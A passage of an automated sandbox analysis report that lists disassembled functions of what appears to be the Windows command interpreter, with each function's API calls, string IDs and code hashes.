                                    • Opcode Fuzzy Hash: f97d90736b195a60c8569bb1f6290ba6137d50272b51b8141da158bcb1f471f0
                                    • Instruction Fuzzy Hash: 405138353046029FEB2DDF79B808A773BE5FF18624715486EE842C7286EF21D841CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FA834, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 251COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011FA879
                                    • memset.MSVCRT ref: 011FA8A1
                                    • memset.MSVCRT ref: 011FA8C9
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,011D21E8,?,?,?,-00000105,-00000105,-00000105), ref: 011FA9F1
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 011FA9FB
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 011FAA0D
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB45
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB52
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FAB5F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$ErrorLast$InformationVolume
                                    • String ID: %04X-%04X
                                    • API String ID: 2748242238-1126166780
                                    • Opcode ID: dc435e6aa930e89b14a801fb84479ad59ec97dd80b309e507a008080a3efba67
                                    • Instruction ID: 94e9f4bf92a855db9f811c40c5fd1942edafa6ba79c4867ada87fcda2a5e8930
                                    • Opcode Fuzzy Hash: dc435e6aa930e89b14a801fb84479ad59ec97dd80b309e507a008080a3efba67
                                    • Instruction Fuzzy Hash: 6291C4B1A012295BDF29DA64DC44AEA77B9EF54258F4404EDE60DE3141EB349F88CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E3121, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011E3160
                                    • memset.MSVCRT ref: 011E3180
                                    • memset.MSVCRT ref: 011E31A9
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,00000000,?,?,011D21E8,?,?,?,-00000105,-00000105,-00000105), ref: 011E32AB
                                    • _wcsicmp.MSVCRT ref: 011E32C9
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32DF
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32E9
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E32F6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$InformationVolume_wcsicmp
                                    • String ID: FAT
                                    • API String ID: 4247940253-238207945
                                    • Opcode ID: 17f0fed890c4f520608df4c101148aab6c829bea113fd70007e471f0c3852b99
                                    • Instruction ID: 2f8af6c6ac2adc470c54c2c8a728e0d2c05dde3b0e6128891aa713d2ca43ffdb
                                    • Opcode Fuzzy Hash: 17f0fed890c4f520608df4c101148aab6c829bea113fd70007e471f0c3852b99
                                    • Instruction Fuzzy Hash: 365143B1A106199BDF28CAE4DC9DBEA77F8FB14348F0400E9E519E3141EB759E84CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DAD44, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011DAD95
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,00000000,?,00000001), ref: 011DADEA
                                    • wcsncmp.MSVCRT(?,\\.\,00000004), ref: 011DAE0D
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DAE68
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000037,00000000,?,?), ref: 011F128D
                                      • Part of subcall function 011E22C0: wcschr.MSVCRT ref: 011E22CC
                                    • wcsstr.MSVCRT ref: 011F1249
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F1266
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F12A5
                                      • Part of subcall function 011E68BA: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000037,00000000,00000000,00000002,00000000,?,00000000,011E6A00,011E6A00,?,011DAE4F,00000037,00000000,?), ref: 011E68E6
                                      • Part of subcall function 011DCD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,011F9362,00000000,00000000,?,011E9814,00000000), ref: 011DCD55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: File$AttributesFindmemset$CloseDriveFirstFullNamePathTypewcschrwcsncmpwcsstr
                                    • String ID: \\.\
                                    • API String ID: 52035941-2900601889
                                    • Opcode ID: 538ca310f4d7d64a4e453fcb6db8789f359e8cdf660569385473e9f82fb66834
                                    • Instruction ID: b9982ff7bba0fc8d7c8cb2771a2f88bc23f943d8e867d9336029e6e3ccd5e984
                                    • Opcode Fuzzy Hash: 538ca310f4d7d64a4e453fcb6db8789f359e8cdf660569385473e9f82fb66834
                                    • Instruction Fuzzy Hash: DE411C75504351ABDB38DFA8A888A6FBBE8EF94714F14081DF955C3181EB30D944C7A3
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FAEE5, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 337COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 011FB4DD: free.MSVCRT(?,0000000A,00000000,?,011F35C4), ref: 011FB4FB
                                      • Part of subcall function 011FB4DD: free.MSVCRT(?,0000000A,00000000,?,011F35C4), ref: 011FB508
                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000,?,00000000), ref: 011FAF84
                                    • qsort.MSVCRT ref: 011FB007
                                    • wcschr.MSVCRT ref: 011FB05C
                                    • calloc.MSVCRT ref: 011FB09E
                                    • calloc.MSVCRT ref: 011FB16F
                                    • wcschr.MSVCRT ref: 011FB1B8
                                    • memcpy.MSVCRT ref: 011FB20A
                                    • memcpy.MSVCRT ref: 011FB22B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                    • String ID: &()[]{}^=;!%'+,`~
                                    • API String ID: 975110957-381716982
                                    • Opcode ID: 00ce3fc47b8d2a4632742c067210552b94a09000676acfd28a0e68ab09a26601
                                    • Instruction ID: 44fc031d226dcfa23b8310eef3ae734f204c33c83a6329ed552545e2878315ba
                                    • Opcode Fuzzy Hash: 00ce3fc47b8d2a4632742c067210552b94a09000676acfd28a0e68ab09a26601
                                    • Instruction Fuzzy Hash: C2C1D276A082159BEB28CFACD8447AEBBB1FF48714F15406DEA48E7341EB309D41CB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F3CC7, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 245timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011F3DED
                                    • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,002E003A), ref: 011F3F21
                                    • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,002E003A,?,002E003A), ref: 011F3F4E
                                    • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,002E003A), ref: 011F3F5B
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,002E003A), ref: 011F3F65
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,002E003A), ref: 011F3FC2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: LocalTime$ErrorLast$_get_osfhandle
                                    • String ID: %s$/-.$:
                                    • API String ID: 1033501010-879152773
                                    • Opcode ID: 98d0240bf57d487f5a7b0751c0276c171fe72203a98ac5a9918e94f9acb30018
                                    • Instruction ID: aaf4496f0f5f4ea29e44c89b40f291fba41fd36363e426528a8b77db2cf638fc
                                    • Opcode Fuzzy Hash: 98d0240bf57d487f5a7b0751c0276c171fe72203a98ac5a9918e94f9acb30018
                                    • Instruction Fuzzy Hash: 67812531A2022687EF2C9E78C859BEE33A5BF80304F44416CDA26D72D5EB719A46C752
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D9A26, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsicmp$iswspace
                                    • String ID: =,;$FOR/?
                                    • API String ID: 759518647-2121398454
                                    • Opcode ID: b77ce97a736d4013ad29b70013c95d69b8778377815fbea10cd2448db8cd1092
                                    • Instruction ID: 62e96f59beb866161447ff4f1d43b5cbffa754f38dadb6dd76477d9074248b0a
                                    • Opcode Fuzzy Hash: b77ce97a736d4013ad29b70013c95d69b8778377815fbea10cd2448db8cd1092
                                    • Instruction Fuzzy Hash: EF6113313407429BEB3DAB7AF95DB7A37A0EB9061CF54411EE2038A9C1EF71A482C715
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D64DC, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 153COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                    • String ID: +-~!
                                    • API String ID: 2191331888-2604099254
                                    • Opcode ID: 7de3c2ad85934e3951e43913ffc15c5663041ac727e63ba5b3ca1c4b7ddd9602
                                    • Instruction ID: 60309befc6834d5d1945c4748cbbe6b9b343a600474319de1283a0dbaf62c571
                                    • Opcode Fuzzy Hash: 7de3c2ad85934e3951e43913ffc15c5663041ac727e63ba5b3ca1c4b7ddd9602
                                    • Instruction Fuzzy Hash: CC51B071800609EFCF1DDF68E8489AB3BA4EF15364F51811AFC169B184EB74DA94CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F213A, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 102synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,?,00000000,?,00000000,00000000,?,011F2CF5), ref: 011F214C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ObjectSingleWait
                                    • String ID: wil
                                    • API String ID: 24740636-1589926490
                                    • Opcode ID: 0d9749f68f082dfa7dc224af61c816a73574b999e59430d4e99bfa56b4569228
                                    • Instruction ID: 449603242a98b89dcc6024e88fb28d9ddfc6f3ae99c9e356955644bf3ea0ab5c
                                    • Opcode Fuzzy Hash: 0d9749f68f082dfa7dc224af61c816a73574b999e59430d4e99bfa56b4569228
                                    • Instruction Fuzzy Hash: 14319538705215ABFB298A69AC88BBB3669EF81354F20413DFB01D7285D774CD428757
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F7C83, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 91windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,00000104,00000000,?,0000000A,?,?,?), ref: 011F7CB9
                                    • _ultoa.MSVCRT ref: 011F7CCF
                                    • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011F7CD8
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000,011FA21D,000000FF,?,00000020), ref: 011F7CF9
                                    • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 011F7D31
                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 011F7D65
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                    • String ID: (#$Application$System
                                    • API String ID: 3377411628-593978566
                                    • Opcode ID: 722dc52f7f8049c73965e17574857151c91a28a50a61468af6658aa434f25b9a
                                    • Instruction ID: 6dcdd1b9fc6f390178417ddb2751552c779f80dbc392e63d76c9a12e2a66fd9c
                                    • Opcode Fuzzy Hash: 722dc52f7f8049c73965e17574857151c91a28a50a61468af6658aa434f25b9a
                                    • Instruction Fuzzy Hash: 1D318D71A00208ABDF25DFA5DC08DEE7BB9FB99714F60422DE911E7180EB309941CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D8885, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011D88A8
                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011D88B8
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F0650
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F0662
                                    • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F067E
                                    • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,?,00000000,?,?,011D8857,-00000105), ref: 011F068D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                    • String ID: :$\
                                    • API String ID: 3961617410-1166558509
                                    • Opcode ID: 9363cbeb5b863c2f79b934e8eba0d316866dfdb0afcb4254c7910fdf505969f9
                                    • Instruction ID: 4d899fcd761e5aa527f7c1f72e3e70dc2bcc79a9c61047da9cbfac441b95da2d
                                    • Opcode Fuzzy Hash: 9363cbeb5b863c2f79b934e8eba0d316866dfdb0afcb4254c7910fdf505969f9
                                    • Instruction Fuzzy Hash: C011A331E00114AB9B39EB68B85D57E7BB9EB95764B15022CF917E2148EF708941C2A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E2DD2, Relevance: 15.4, APIs: 10, Instructions: 400COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011E2E1C
                                    • memset.MSVCRT ref: 011E2E40
                                    • memset.MSVCRT ref: 011E2E64
                                    • memset.MSVCRT ref: 011E2E88
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F81
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F8E
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2F9B
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E2FA5
                                      • Part of subcall function 011E4E94: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,011E2F2C,-00000001,-00000001,-00000001,-00000001), ref: 011E4ED6
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$BufferConsoleInfoScreen
                                    • String ID:
                                    • API String ID: 1034426908-0
                                    • Opcode ID: 6126e0924b132e4afb6b0895a71737dd6ef4bc6d0b98dc3fe17df98e6ccef046
                                    • Instruction ID: 0d9978aa5c54a0c9e1598d9a801b889e23451e6f4f1ce1c119389dcb5bd3e0ea
                                    • Opcode Fuzzy Hash: 6126e0924b132e4afb6b0895a71737dd6ef4bc6d0b98dc3fe17df98e6ccef046
                                    • Instruction Fuzzy Hash: 8AE19071A00A1A9BDF2DDFA5DC58AAABBF5FF54314F044099E50997240EB34EE80CF90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DBF30, Relevance: 15.3, APIs: 10, Instructions: 259COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011DBF80
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000105), ref: 011DBFC6
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DBFE1
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DBFF2
                                      • Part of subcall function 011E29BB: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(011E0B22,011E0B22,00007FE7), ref: 011E29E9
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC00E
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DC0C0
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011DC0CA
                                    • CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000), ref: 011DC0E5
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011EA502
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CreateDirectoryErrorLast$DriveFullNamePathTypememset
                                    • String ID:
                                    • API String ID: 402963468-0
                                    • Opcode ID: b70cf01f259ef184adec374738a7905b66bbb10c612044aac7d31b3976c0d51c
                                    • Instruction ID: 4d60beba817b71fff9d89e3844ca4d8c32e720c5dda63b5a15b768ccf64682b8
                                    • Opcode Fuzzy Hash: b70cf01f259ef184adec374738a7905b66bbb10c612044aac7d31b3976c0d51c
                                    • Instruction Fuzzy Hash: 74810835A006169BEB3CDF99E85CBBAB7F4EF49704F0584A9E606D7180E7708D80CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F396E, Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,0000000A,00000000,00000001,?,011F3B43,?,?,?,011F977C), ref: 011F398D
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F39A9
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011FD620,?,?,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F39BA
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F39C3
                                    • memcmp.MSVCRT ref: 011F3A02
                                    • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,?,01217F20,?,?,?,011F3B43,?,?,?,011F977C), ref: 011F3A93
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F3ABE
                                    • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F3ACB
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,011FD621,00000001,011F977C,00000000,?,011F3B43,?,?,?,011F977C), ref: 011F3AE0
                                    • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(01217F20,?,011F3B43,?,?,?,011F977C), ref: 011F3AED
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                    • String ID:
                                    • API String ID: 2002953238-0
                                    • Opcode ID: 53493e86bd9de619dd3d1388a24d48fc76c1e364cfe2fb9351ba471fa43fbdee
                                    • Instruction ID: 2a932ff4d00e50243cfc1cb7b4d9efb4e6b448031b20eb7c8a4e544b029da471
                                    • Opcode Fuzzy Hash: 53493e86bd9de619dd3d1388a24d48fc76c1e364cfe2fb9351ba471fa43fbdee
                                    • Instruction Fuzzy Hash: F451E472E20205AFDF29CF69D848BB9BBB9FF94710F04405DEA25DB280C7718984CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DCDA2, Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _wcsicmp
                                    • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                    • API String ID: 2081463915-1668778490
                                    • Opcode ID: 4e631e91ebf9a9762baa4beb6c7aa15b5fdf1ced6c5ac39fbcdbcd7f4a6ddbd7
                                    • Instruction ID: c7bf34167b3254974b6e8411aea9e032114d969f92fb0106cb8cb3ad50d2847c
                                    • Opcode Fuzzy Hash: 4e631e91ebf9a9762baa4beb6c7aa15b5fdf1ced6c5ac39fbcdbcd7f4a6ddbd7
                                    • Instruction Fuzzy Hash: 08210BB16487139AFB3D5B7AA81972B7ECEDF541A4F14481FE143811C0EF759840C39A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DD97E, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 268COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011DD9BE
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • _get_osfhandle.MSVCRT ref: 011DDAA6
                                    • _get_osfhandle.MSVCRT ref: 011DDAB7
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011DDB53
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _get_osfhandlememset
                                    • String ID: DPATH
                                    • API String ID: 3784859044-2010427443
                                    • Opcode ID: 58cb7c300d46dc766b43c71f9d40c6ecaf1f5ea46c9aa7ae8ea77bd334a03f73
                                    • Instruction ID: 63e866420da51ac2be241b7621f2ca99e67be17c8e9060e40eaa3eab2779bae5
                                    • Opcode Fuzzy Hash: 58cb7c300d46dc766b43c71f9d40c6ecaf1f5ea46c9aa7ae8ea77bd334a03f73
                                    • Instruction Fuzzy Hash: E0912870A00516AFDF2DEFE8EC88AAABBE1FF54318B144159E505972C4DB31A980CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F59E6, Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 211registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 011F5AEF
                                    • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 011F5B7B
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011F5BA2
                                    • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,011D24AC,00000000,00000002,?,00000000), ref: 011F5C13
                                    • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 011F5C4F
                                    • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011F5C71
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CloseValue$CreateDeleteOpen
                                    • String ID: %s=%s$\Shell\Open\Command
                                    • API String ID: 4081037667-3301834661
                                    • Opcode ID: 5fb341b44867538043849bf8843b4877a587152ffdcb3b721eea214cbf49da9b
                                    • Instruction ID: 4611ca80388571c73a2f4885fb820918cd75239cb0cef39727a3310818eb0d83
                                    • Opcode Fuzzy Hash: 5fb341b44867538043849bf8843b4877a587152ffdcb3b721eea214cbf49da9b
